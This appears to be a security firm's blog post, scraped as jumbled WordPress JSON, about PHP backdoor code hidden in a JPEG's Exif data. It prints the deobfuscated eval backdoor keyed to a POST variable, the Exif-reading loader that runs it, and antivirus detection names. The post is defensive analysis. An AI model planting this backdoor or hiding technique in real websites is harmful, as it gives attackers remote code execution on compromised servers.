![\"Malicious](\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2014\/07\/malicious-exif-data.png\")
<\/p>\n
When deobfuscated<\/a> the full code in the model tag reads:<\/p>\n if (isset($_POST[“zz1”])) {eval(stripslashes($_POST[“zz1”]));}<\/p><\/blockquote>\n That code would evaluate (run) the data sent with\u00a0POST variable zz1.<\/p>\n On its own the image file\u00a0is harmless since the web server will not run the code stored in the Exif data, so a second file is used in conjunction with the image file. In this case the file consisted of two lines of code:<\/p>\n <?php The first line reads the Exif data and the second executes the code stored in the image. The code looks rather harmless by itself, so it could easily be missed when checking for malicious code.<\/p>\n If a malicious code scanner doesn’t\u00a0check the Exif data of image files then the malicious code could unnoticed in that as well. In this case the malicious code was detected not by something scanning the server, but by desktop antivirus software checking as the website was being visited by normal users. When we were first contacted about the website we were somewhat confused about why it would be setting anti-virus software because we were not being served any malware by the website and the only outward impact of the hack was some hidden spam links, which usually don’t set off anti-virus software. Once we got in to clean it up we found the malicious code in some image file’s Exif data and were able to figure out what was going on.<\/p>\n Running an image file with the modifications made by the hacker to the Exif data through VirusTotal<\/a> shows that 21 of the 53 virus scanners they check currently identify the malicious code (shown below). Of those, 13 include PHP in their label which makes identifying what is going easier than other likes Symantec, which simply lists it as a “Trojan Horse”.<\/p>\n AVG:<\/strong> PHP\/Small.A We don’t write\u00a0much on what hackers do with websites once they hacked them since the focus of security companies should be on making sure that website don’t get hacked in the first place, which wouldn’t be hard to do if the companies were interested in that, but sometimes hackers are doing something worth discussing. Hackers … Continue reading “Hackers Hiding Malicious Code in Exif Data of Images”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[],"class_list":["post-2097","post","type-post","status-publish","format-standard","hentry","category-website-hacked"],"_links":{"self":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2097","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/comments?post=2097"}],"version-history":[{"count":8,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2097\/revisions"}],"predecessor-version":[{"id":2106,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2097\/revisions\/2106"}],"wp:attachment":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/media?parent=2097"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/categories?post=2097"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/tags?post=2097"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\n$exif = exif_read_data(‘\/[redacted]\/templates\/ja_purity\/images\/header\/header4.jpg’);
\npreg_replace($exif[‘Make’],$exif[‘Model’],”);
\n?><\/p><\/blockquote>\n
\nAd-Aware:<\/strong> Trojan.PHP.Agent.GA
\nAntiVir:<\/strong> PHP\/Agent.xadx
\nAvast:<\/strong> JPG:PHPAgent-A [Trj]
\nBitDefender:<\/strong> Trojan.PHP.Agent.GA
\nCAT-QuickHeal:<\/strong> JPEG.Trojan.Agent.GA
\nEmsisoft:<\/strong> Trojan.PHP.Agent.GA (B)
\nF-Secure:<\/strong> Trojan.PHP.Agent.GA
\nGData:<\/strong> Trojan.PHP.Agent.GA
\nIkarus:<\/strong> Backdoor.PHP.Agent
\nKaspersky:<\/strong> Trojan.PHP.Agent.dn
\nMcAfee:<\/strong> Generic BackDoor.agb
\nMcAfee-GW-Edition:<\/strong> Generic BackDoor.agb
\nMicroWorld-eScan:<\/strong> Trojan.PHP.Agent.GA
\nMicrosoft:<\/strong> Backdoor:PHP\/Small.J
\nNANO-Antivirus:<\/strong> Trojan.Jpg.Agent.cgxikf
\nNorman:<\/strong> Backdoor.CDG
\nSymantec:<\/strong> Trojan Horse
\nTrendMicro:<\/strong> BKDR_ZZPEG.SM
\nTrendMicro-HouseCall:<\/strong> BKDR_ZZPEG.SM
\nnProtect<\/strong>\u00a0:Trojan.PHP.Agent.GA<\/p>\n","protected":false},"excerpt":{"rendered":"